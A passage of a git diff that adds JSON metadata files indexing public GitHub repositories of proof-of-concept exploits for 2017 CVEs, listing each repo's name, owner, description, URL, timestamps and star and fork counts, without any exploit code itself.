"user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/GainSec\/CVE-2017-16744-and-CVE-2017-16748-Tridium-Niagara", + "description": " Proof of Concept (PoC) for CVE: 2017-16744 and 2017-16748", + "fork": false, + "created_at": "2019-09-09T19:08:59Z", + "updated_at": "2022-06-19T07:16:46Z", + "pushed_at": "2022-07-03T18:37:23Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-16778.json b/2017/CVE-2017-16778.json new file mode 100644 index 0000000000..3108d0890b --- /dev/null +++ b/2017/CVE-2017-16778.json @@ -0,0 +1,33 @@ +[ + { + "id": 229211992, + "name": "CVE-2017-16778-Intercom-DTMF-Injection", + "full_name": "breaktoprotect\/CVE-2017-16778-Intercom-DTMF-Injection", + "owner": { + "login": "breaktoprotect", + "id": 4725563, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4725563?v=4", + "html_url": "https:\/\/github.com\/breaktoprotect", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/breaktoprotect\/CVE-2017-16778-Intercom-DTMF-Injection", + "description": "A coordinated disclosure and security advisory on Fermax Intercom DTML Injection vulneraiblity. Special thanks to Fermax International for prompt responses and allowing details to be publicized.", + "fork": false, + "created_at": "2019-12-20T07:20:50Z", + "updated_at": "2024-10-27T03:23:51Z", + "pushed_at": "2020-07-30T19:15:08Z", + "stargazers_count": 22, + "watchers_count": 22, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 22, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-16806.json b/2017/CVE-2017-16806.json new file mode 100644 index 0000000000..14bbc5b5f1 --- /dev/null +++ b/2017/CVE-2017-16806.json @@ -0,0 +1,33 @@ +[ + { + "id": 110611562, + "name": "ulteriusExploit", + "full_name": "rickoooooo\/ulteriusExploit", + "owner": { + "login": "rickoooooo", + "id": 33641230, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33641230?v=4", + "html_url": "https:\/\/github.com\/rickoooooo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rickoooooo\/ulteriusExploit", + "description": "Python exploit for CVE-2017-16806", + "fork": false, + "created_at": "2017-11-13T22:48:46Z", + "updated_at": "2022-11-09T17:58:29Z", + "pushed_at": "2017-11-13T23:04:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-16943.json b/2017/CVE-2017-16943.json new file mode 100644 index 0000000000..30aac8ff1b --- /dev/null +++ b/2017/CVE-2017-16943.json @@ -0,0 +1,33 @@ +[ + { + "id": 158365908, + "name": "CVE-2017-16943", + "full_name": "beraphin\/CVE-2017-16943", + "owner": { + "login": "beraphin", + "id": 25315905, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25315905?v=4", + "html_url": "https:\/\/github.com\/beraphin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/beraphin\/CVE-2017-16943", + "description": null, + "fork": false, + "created_at": "2018-11-20T09:46:25Z", + "updated_at": "2019-11-14T08:01:14Z", + "pushed_at": "2019-11-14T08:01:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-16994.json b/2017/CVE-2017-16994.json new file mode 100644 index 0000000000..ce91fe6bcc --- /dev/null +++ b/2017/CVE-2017-16994.json @@ -0,0 +1,33 @@ +[ + { + "id": 624809789, + "name": "CVE-2017-16994", + "full_name": "jedai47\/CVE-2017-16994", + "owner": { + "login": "jedai47", + "id": 47899257, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47899257?v=4", + "html_url": "https:\/\/github.com\/jedai47", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jedai47\/CVE-2017-16994", + "description": null, + "fork": false, + "created_at": "2023-04-07T10:03:49Z", + "updated_at": "2024-05-22T13:34:56Z", + "pushed_at": "2024-05-22T13:34:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-16995.json b/2017/CVE-2017-16995.json new file mode 100644 index 0000000000..1dc133feb4 --- /dev/null +++ b/2017/CVE-2017-16995.json @@ -0,0 +1,409 @@ +[ + { + "id": 125850596, + "name": "CVE-2017-16995", + "full_name": "C0dak\/CVE-2017-16995", + "owner": { + "login": "C0dak", + "id": 17883550, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17883550?v=4", + "html_url": "https:\/\/github.com\/C0dak", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/C0dak\/CVE-2017-16995", + "description": "Linux Kernel Version 4.14 - 4.4 (Ubuntu && Debian)", + "fork": false, + "created_at": "2018-03-19T11:58:20Z", + "updated_at": "2024-08-12T19:37:03Z", + "pushed_at": "2018-03-19T05:59:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 15, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 15, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 131100341, + "name": "CVE-2017-16995", + "full_name": "Al1ex\/CVE-2017-16995", + "owner": { + "login": "Al1ex", + "id": 38161463, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38161463?v=4", + "html_url": "https:\/\/github.com\/Al1ex", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Al1ex\/CVE-2017-16995", + "description": "CVE-2017-16995(Ubuntu本地提权漏洞)", + "fork": false, + "created_at": "2018-04-26T04:33:50Z", + "updated_at": "2024-08-12T19:38:03Z", + "pushed_at": "2021-09-08T03:53:24Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 10, + "watchers": 12, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 153606892, + "name": "CVE-2017-16995", + "full_name": "gugronnier\/CVE-2017-16995", + "owner": { + "login": "gugronnier", + "id": 22094271, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22094271?v=4", + "html_url": "https:\/\/github.com\/gugronnier", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gugronnier\/CVE-2017-16995", + "description": "Exploit adapted for a specific PoC on Ubuntu 16.04.01", + "fork": false, + "created_at": "2018-10-18T10:34:24Z", + "updated_at": "2023-12-26T00:01:01Z", + "pushed_at": "2018-12-05T12:50:33Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 166941690, + "name": "cve-2017-16995", + "full_name": "senyuuri\/cve-2017-16995", + "owner": { + "login": "senyuuri", + "id": 2610986, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2610986?v=4", + "html_url": "https:\/\/github.com\/senyuuri", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/senyuuri\/cve-2017-16995", + "description": "Writeup for CVE-2017-16995 Linux BPF Local Privilege Escalation", + "fork": false, + "created_at": "2019-01-22T06:42:27Z", + "updated_at": "2022-03-28T19:30:13Z", + "pushed_at": "2019-01-22T06:43:13Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 198427526, + "name": "CVE-2017-16995", + "full_name": "vnik5287\/CVE-2017-16995", + "owner": { + "login": "vnik5287", + "id": 9650718, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9650718?v=4", + "html_url": "https:\/\/github.com\/vnik5287", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vnik5287\/CVE-2017-16995", + "description": "CVE-2017-16995 eBPF PoC for Ubuntu 16.04", + "fork": false, + "created_at": "2019-07-23T12:37:27Z", + "updated_at": "2019-07-23T22:56:11Z", + "pushed_at": "2019-07-23T12:37:41Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 202306651, + "name": "CVE-2017-16995", + "full_name": "littlebin404\/CVE-2017-16995", + "owner": { + "login": "littlebin404", + "id": 54022042, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54022042?v=4", + "html_url": "https:\/\/github.com\/littlebin404", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/littlebin404\/CVE-2017-16995", + "description": "CVE-2017-16995 ubuntun本地提权 POC", + "fork": false, + "created_at": "2019-08-14T08:21:05Z", + "updated_at": "2019-08-14T08:44:57Z", + "pushed_at": "2019-08-14T08:34:51Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 263389053, + "name": "CVE-2017-16995-Linux-Kernel---BPF-Sign-Extension-Local-Privilege-Escalation-", + "full_name": "Lumindu\/CVE-2017-16995-Linux-Kernel---BPF-Sign-Extension-Local-Privilege-Escalation-", + "owner": { + "login": "Lumindu", + "id": 61973691, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61973691?v=4", + "html_url": "https:\/\/github.com\/Lumindu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Lumindu\/CVE-2017-16995-Linux-Kernel---BPF-Sign-Extension-Local-Privilege-Escalation-", + "description": null, + "fork": false, + "created_at": "2020-05-12T16:19:10Z", + "updated_at": "2020-05-12T17:06:17Z", + "pushed_at": "2020-05-12T17:06:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 333709825, + "name": "CVE-2017-16995", + "full_name": "ph4ntonn\/CVE-2017-16995", + "owner": { + "login": "ph4ntonn", + "id": 45198234, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45198234?v=4", + "html_url": "https:\/\/github.com\/ph4ntonn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ph4ntonn\/CVE-2017-16995", + "description": "👻CVE-2017-16995", + "fork": false, + "created_at": "2021-01-28T09:32:04Z", + "updated_at": "2021-03-26T06:05:53Z", + "pushed_at": "2021-01-28T10:06:15Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2017-16995", + "exploit" + ], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 565183343, + "name": "cve-2017-16995.c", + "full_name": "ivilpez\/cve-2017-16995.c", + "owner": { + "login": "ivilpez", + "id": 118066631, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/118066631?v=4", + "html_url": "https:\/\/github.com\/ivilpez", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ivilpez\/cve-2017-16995.c", + "description": null, + "fork": false, + "created_at": "2022-11-12T15:47:19Z", + "updated_at": "2022-11-26T16:37:59Z", + "pushed_at": "2022-11-26T16:37:55Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 571981379, + "name": "CVE-2017-16995", + "full_name": "fei9747\/CVE-2017-16995", + "owner": { + "login": "fei9747", + "id": 37730810, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37730810?v=4", + "html_url": "https:\/\/github.com\/fei9747", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fei9747\/CVE-2017-16995", + "description": null, + "fork": false, + "created_at": "2022-11-29T09:59:40Z", + "updated_at": "2022-11-29T09:59:57Z", + "pushed_at": "2022-11-29T09:59:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 586815834, + "name": "CVE-2017-16995", + "full_name": "anldori\/CVE-2017-16995", + "owner": { + "login": "anldori", + "id": 101538840, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101538840?v=4", + "html_url": "https:\/\/github.com\/anldori", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/anldori\/CVE-2017-16995", + "description": "CVE-2017-16995 Linux POC", + "fork": false, + "created_at": "2023-01-09T09:50:41Z", + "updated_at": "2023-01-09T09:51:19Z", + "pushed_at": "2023-01-09T09:52:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 731291166, + "name": "cve-2017-16995", + "full_name": "mareks1007\/cve-2017-16995", + "owner": { + "login": "mareks1007", + "id": 126665265, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/126665265?v=4", + "html_url": "https:\/\/github.com\/mareks1007", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mareks1007\/cve-2017-16995", + "description": null, + "fork": false, + "created_at": "2023-12-13T18:49:54Z", + "updated_at": "2023-12-13T18:49:54Z", + "pushed_at": "2023-12-13T18:55:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 732015146, + "name": "cve-2017-16995", + "full_name": "ZhiQiAnSecFork\/cve-2017-16995", + "owner": { + "login": "ZhiQiAnSecFork", + "id": 100925999, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100925999?v=4", + "html_url": "https:\/\/github.com\/ZhiQiAnSecFork", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ZhiQiAnSecFork\/cve-2017-16995", + "description": null, + "fork": false, + "created_at": "2023-12-15T12:30:57Z", + "updated_at": "2023-12-15T12:31:38Z", + "pushed_at": "2023-12-15T12:31:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-16997.json b/2017/CVE-2017-16997.json new file mode 100644 index 0000000000..c3ef16e133 --- /dev/null +++ b/2017/CVE-2017-16997.json @@ -0,0 +1,33 @@ +[ + { + "id": 116118639, + "name": "CVE-2017-16997-poc", + "full_name": "Xiami2012\/CVE-2017-16997-poc", + "owner": { + "login": "Xiami2012", + "id": 1927254, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1927254?v=4", + "html_url": "https:\/\/github.com\/Xiami2012", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Xiami2012\/CVE-2017-16997-poc", + "description": "A proof-of-concept for CVE-2017-16997", + "fork": false, + "created_at": "2018-01-03T09:31:55Z", + "updated_at": "2018-01-03T09:33:01Z", + "pushed_at": "2018-01-03T10:39:28Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-17058.json b/2017/CVE-2017-17058.json new file mode 100644 index 0000000000..b9985101ab --- /dev/null +++ b/2017/CVE-2017-17058.json @@ -0,0 +1,33 @@ +[ + { + "id": 366451599, + "name": "CVE-2017-17058-woo_exploit", + "full_name": "fu2x2000\/CVE-2017-17058-woo_exploit", + "owner": { + "login": "fu2x2000", + "id": 34998869, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34998869?v=4", + "html_url": "https:\/\/github.com\/fu2x2000", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fu2x2000\/CVE-2017-17058-woo_exploit", + "description": null, + "fork": false, + "created_at": "2021-05-11T16:43:00Z", + "updated_at": "2021-09-01T17:56:23Z", + "pushed_at": "2021-05-15T11:16:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-17099.json b/2017/CVE-2017-17099.json new file mode 100644 index 0000000000..9b3d819ae5 --- /dev/null +++ b/2017/CVE-2017-17099.json @@ -0,0 +1,33 @@ +[ + { + "id": 89426502, + "name": "Exploit-Development", + "full_name": "wetw0rk\/Exploit-Development", + "owner": { + "login": "wetw0rk", + "id": 20763546, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20763546?v=4", + "html_url": "https:\/\/github.com\/wetw0rk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wetw0rk\/Exploit-Development", + "description": "CVE-2020-8012, CVE-2016-10709, CVE-2017-17099, CVE-2017-18047, CVE-2019-1003000, CVE-2018-1999002", + "fork": false, + "created_at": "2017-04-26T02:03:43Z", + "updated_at": "2024-08-12T19:29:24Z", + "pushed_at": "2020-02-29T21:27:15Z", + "stargazers_count": 56, + "watchers_count": 56, + "has_discussions": false, + "forks_count": 34, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 34, + "watchers": 56, + "score": 0, + "subscribers_count": 6 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-17215.json b/2017/CVE-2017-17215.json new file mode 100644 index 0000000000..b88cb7987c --- /dev/null +++ b/2017/CVE-2017-17215.json @@ -0,0 +1,101 @@ +[ + { + "id": 115311315, + "name": "CVE-2017-17215", + "full_name": "1337g\/CVE-2017-17215", + "owner": { + "login": "1337g", + "id": 32504404, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32504404?v=4", + "html_url": "https:\/\/github.com\/1337g", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/1337g\/CVE-2017-17215", + "description": "CVE-2017-17215 HuaWei Router RCE (NOT TESTED)", + "fork": false, + "created_at": "2017-12-25T06:11:24Z", + "updated_at": "2023-08-22T23:07:39Z", + "pushed_at": "2018-01-04T02:31:57Z", + "stargazers_count": 25, + "watchers_count": 25, + "has_discussions": false, + "forks_count": 17, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 17, + "watchers": 25, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 313596733, + "name": "HG532d-RCE-Exploit", + "full_name": "wilfred-wulbou\/HG532d-RCE-Exploit", + "owner": { + "login": "wilfred-wulbou", + "id": 25276623, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25276623?v=4", + "html_url": "https:\/\/github.com\/wilfred-wulbou", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wilfred-wulbou\/HG532d-RCE-Exploit", + "description": "A Remote Code Execution (RCE) exploit for Huawei HG532d based on CVE-2017-17215 vulnerability. Modded from original PoC code from exploit-db.com", + "fork": false, + "created_at": "2020-11-17T11:22:20Z", + "updated_at": "2024-08-12T20:07:42Z", + "pushed_at": "2021-03-31T23:28:44Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2017-17215", + "exploit", + "hg532", + "rce", + "vulnerability" + ], + "visibility": "public", + "forks": 7, + "watchers": 8, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 560898089, + "name": "HuaWei_Route_HG532_RCE_CVE-2017-17215", + "full_name": "ltfafei\/HuaWei_Route_HG532_RCE_CVE-2017-17215", + "owner": { + "login": "ltfafei", + "id": 43526141, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43526141?v=4", + "html_url": "https:\/\/github.com\/ltfafei", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ltfafei\/HuaWei_Route_HG532_RCE_CVE-2017-17215", + "description": "POCsuite与goland实现华为HG532路由器命令注入CVE-2017-17215 POC", + "fork": false, + "created_at": "2022-11-02T14:07:08Z", + "updated_at": "2022-11-02T14:07:08Z", + "pushed_at": "2022-11-02T14:27:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-17275.json b/2017/CVE-2017-17275.json new file mode 100644 index 0000000000..de43b7a136 --- /dev/null +++ b/2017/CVE-2017-17275.json @@ -0,0 +1,38 @@ +[ + { + "id": 410291020, + "name": "CVE-2017-17275", + "full_name": "kd992102\/CVE-2017-17275", + "owner": { + "login": "kd992102", + "id": 30813510, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30813510?v=4", + "html_url": "https:\/\/github.com\/kd992102", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kd992102\/CVE-2017-17275", + "description": "exploit", + "fork": false, + "created_at": "2021-09-25T14:16:54Z", + "updated_at": "2021-10-11T00:48:34Z", + "pushed_at": "2021-09-25T15:06:43Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2017-17215", + "exploit", + "hg532", + "hg532d" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-17309.json b/2017/CVE-2017-17309.json new file mode 100644 index 0000000000..555968e0b1 --- /dev/null +++ b/2017/CVE-2017-17309.json @@ -0,0 +1,54 @@ +[ + { + "id": 107989670, + "name": "huawei_hg255s_exploit", + "full_name": "exploit-labs\/huawei_hg255s_exploit", + "owner": { + "login": "exploit-labs", + "id": 54153194, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54153194?v=4", + "html_url": "https:\/\/github.com\/exploit-labs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/exploit-labs\/huawei_hg255s_exploit", + "description": "🚀 Server Directory Traversal at Huawei HG255s ☄️ - CVE-2017-17309 🚀", + "fork": false, + "created_at": "2017-10-23T13:57:27Z", + "updated_at": "2024-09-02T20:50:44Z", + "pushed_at": "2020-06-21T09:29:44Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2017-17309", + "directory-traversal", + "exploit", + "exploit-code", + "exploit-database", + "exploit-development", + "exploitation", + "exploiting-vulnerabilities", + "exploits", + "hacking", + "hacking-tool", + "hardware-hacking", + "hg255s", + "hg255s-exploit", + "huawei", + "huawei-devices", + "modem", + "rce", + "vulnerability", + "vulnerability-exploits" + ], + "visibility": "public", + "forks": 7, + "watchers": 13, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-17485.json b/2017/CVE-2017-17485.json new file mode 100644 index 0000000000..08a8d25ec8 --- /dev/null +++ b/2017/CVE-2017-17485.json @@ -0,0 +1,95 @@ +[ + { + "id": 158195318, + "name": "CVE-2017-17485", + "full_name": "tafamace\/CVE-2017-17485", + "owner": { + "login": "tafamace", + "id": 45160113, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45160113?v=4", + "html_url": "https:\/\/github.com\/tafamace", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tafamace\/CVE-2017-17485", + "description": null, + "fork": false, + "created_at": "2018-11-19T09:29:28Z", + "updated_at": "2018-11-19T10:33:01Z", + "pushed_at": "2018-11-19T10:32:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 182537771, + "name": "cve-2017-17485", + "full_name": "x7iaob\/cve-2017-17485", + "owner": { + "login": "x7iaob", + "id": 29616658, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29616658?v=4", + "html_url": "https:\/\/github.com\/x7iaob", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/x7iaob\/cve-2017-17485", + "description": "cve-2017-17485 PoC", + "fork": false, + "created_at": "2019-04-21T13:36:03Z", + "updated_at": "2019-10-19T11:45:50Z", + "pushed_at": "2019-04-21T13:37:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 266009300, + "name": "CVE-2017-17485", + "full_name": "Al1ex\/CVE-2017-17485", + "owner": { + "login": "Al1ex", + "id": 38161463, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38161463?v=4", + "html_url": "https:\/\/github.com\/Al1ex", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Al1ex\/CVE-2017-17485", + "description": "CVE-2017-17485:Jackson-databind RCE", + "fork": false, + "created_at": "2020-05-22T03:28:49Z", + "updated_at": "2024-08-12T20:01:44Z", + "pushed_at": "2022-11-16T08:56:52Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-17562.json b/2017/CVE-2017-17562.json new file mode 100644 index 0000000000..ac63486f9f --- /dev/null +++ b/2017/CVE-2017-17562.json @@ -0,0 +1,157 @@ +[ + { + "id": 115486127, + "name": "CVE-2017-17562", + "full_name": "1337g\/CVE-2017-17562", + "owner": { + "login": "1337g", + "id": 32504404, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32504404?v=4", + "html_url": "https:\/\/github.com\/1337g", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/1337g\/CVE-2017-17562", + "description": "CVE-2017-17562 GOAHEAD RCE (Author: Daniel Hodson)", + "fork": false, + "created_at": "2017-12-27T05:46:50Z", + "updated_at": "2018-11-30T02:36:05Z", + "pushed_at": "2017-12-27T05:51:10Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 215594323, + "name": "CVE-2017-17562", + "full_name": "ivanitlearning\/CVE-2017-17562", + "owner": { + "login": "ivanitlearning", + "id": 52420671, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52420671?v=4", + "html_url": "https:\/\/github.com\/ivanitlearning", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ivanitlearning\/CVE-2017-17562", + "description": "Standalone Python 3 exploit for CVE-2017-17562", + "fork": false, + "created_at": "2019-10-16T16:28:27Z", + "updated_at": "2023-11-01T08:50:59Z", + "pushed_at": "2019-11-02T16:16:56Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 9, + "score": 0, + "subscribers_count": 2 + }, + { + 